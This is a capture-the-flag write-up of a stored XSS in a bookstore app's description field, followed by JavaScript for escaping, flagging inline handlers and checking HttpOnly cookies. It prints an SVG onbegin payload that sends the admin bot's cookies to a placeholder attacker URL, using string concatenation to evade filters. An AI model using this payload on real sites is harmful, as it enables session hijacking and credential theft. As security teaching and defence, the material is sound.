Stealer Web Challenge

Web 500

Description

"Welcome to the Bookstore! We've recently implemented a new feature that allows sellers to add detailed descriptions to their books. Our admin bot regularly checks these descriptions for any inappropriate content or out-of-stock items."

Vulnerability Overview

This challenge featured a classic Cross-Site Scripting (XSS) vulnerability that could be leveraged for session hijacking. The goal was to extract the admin bot's session cookie, which contained the flag.

The vulnerability existed in the book description field, which was rendered into the page without sanitizing or encoding the seller's input. This allowed injection of JavaScript code that would execute when the admin bot viewed the book details.

Exploitation Strategy

The exploitation process involved several steps to trigger the XSS and extract the admin bot's cookies:

  1. Create a seller account to gain access to book creation functionality
  2. Add a book with a specially crafted XSS payload in the description
  3. Ensure the book would be reviewed by the admin bot
  4. Capture the admin's session when they viewed the malicious description

Step 1: Initial Reconnaissance

After registering for an account, I discovered the following about the application:

  • Users could register as either buyers or sellers
  • Sellers could create book listings with detailed descriptions
  • Buyers could report books that were listed as in stock but actually unavailable
  • An admin bot would review these reports and check the book descriptions

This admin review process presented an opportunity to execute client-side code in the admin's browser context.

Step 2: Crafting the XSS Payload

I created a seller account and added a book with the following XSS payload in the description field:

XSS payload (HTML):

<svg><animate onbegin="location='link?c='+document['coo'+'kie']" attributename=x>

This payload takes advantage of the onbegin event handler of an SVG animate element, which fires when the animation starts. It redirects the page to a URL I controlled, appending the document's cookies as a query parameter.

The payload reads the cookie through bracket notation with string concatenation (document['coo'+'kie']) to bypass simple filters that block the literal string "cookie".

Step 3: Triggering Admin Review

To ensure the admin bot would view my malicious book description, I:

  1. Set the book's stock to 0 (zero) to mark it as out of stock
  2. Created a second account as a buyer
  3. Searched for my own book using the buyer account
  4. Reported the book as out of stock through the buyer interface

This triggered the admin review process, where the admin bot would automatically visit the book's page to verify the report.

Step 4: Capturing the Flag

When the admin bot visited the book description page, the SVG animation triggered and executed my JavaScript payload, which sent the admin's cookies to my controlled endpoint.

The request received contained the admin's session cookie, which included the flag. The payload effectively exfiltrated the sensitive information without requiring any further interaction.
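The three defensive checks below are an added example, not code from the challenge or the writeup: encoding the description before rendering (the fix for the unencoded field described above), flagging seller-submitted descriptions that carry inline event handlers such as the onbegin used here, and confirming that the session cookie is set HttpOnly so that document.cookie cannot read it. The function and field names are assumptions; the sample input is the payload quoted in this writeup.

```javascript
// Added example (not part of the original writeup). All names are assumptions.

// Constructed test input: the payload from this writeup, used as a seller description.
const SAMPLE_PAYLOAD =
  '<svg><animate onbegin="location=\'link?c=\'+document[\'coo\'+\'kie\']" attributename=x>';

// 1. Output encoding: escape every character that can open markup or
//    terminate an attribute before the description is placed in HTML.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// The vulnerable rendering (raw interpolation) next to the hardened one.
function renderDescriptionUnsafe(description) {
  return `<div class="description">${description}</div>`;
}
function renderDescriptionSafe(description) {
  return `<div class="description">${escapeHtml(description)}</div>`;
}

// 2. Detection: list inline on* handler attributes and other script-bearing
//    constructs in a submitted description, so the submission can be logged
//    or rejected before the admin bot ever renders it.
function findInlineHandlers(description) {
  const hits = [];
  const attrRe = /\son([a-z]+)\s*=/gi;
  let m;
  while ((m = attrRe.exec(description)) !== null) {
    hits.push('on' + m[1].toLowerCase());
  }
  if (/<script\b/i.test(description)) hits.push('script-tag');
  if (/javascript:/i.test(description)) hits.push('javascript-url');
  return hits;
}

// 3. Mitigation check: parse a Set-Cookie header and report whether the
//    session cookie carries HttpOnly, Secure and SameSite. With HttpOnly set,
//    the payload above would have received an empty string instead of the flag.
function cookieFlags(setCookieHeader) {
  const parts = setCookieHeader.split(';').map((p) => p.trim());
  const attrs = parts.slice(1).map((p) => p.toLowerCase());
  return {
    name: parts[0].split('=')[0],
    httpOnly: attrs.includes('httponly'),
    secure: attrs.includes('secure'),
    sameSite: attrs.some((a) => a.startsWith('samesite=')),
  };
}

// Stand-alone demonstration with the constructed inputs.
console.log('unsafe :', renderDescriptionUnsafe(SAMPLE_PAYLOAD));
console.log('safe   :', renderDescriptionSafe(SAMPLE_PAYLOAD));
console.log('flagged:', findInlineHandlers(SAMPLE_PAYLOAD));
console.log('cookie :', cookieFlags('session=constructed-value; Path=/; HttpOnly; Secure; SameSite=Lax'));
```

The encoding step is the actual fix: once the description is treated as text, the svg and animate tags never become elements and onbegin never fires. The handler scan is a coarse pre-filter for logging or review, not a substitute for encoding; bracket-notation tricks like 'coo'+'kie' do not help an attacker against it because it keys on the attribute name, not on the handler body.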

Flag

FlagY{******}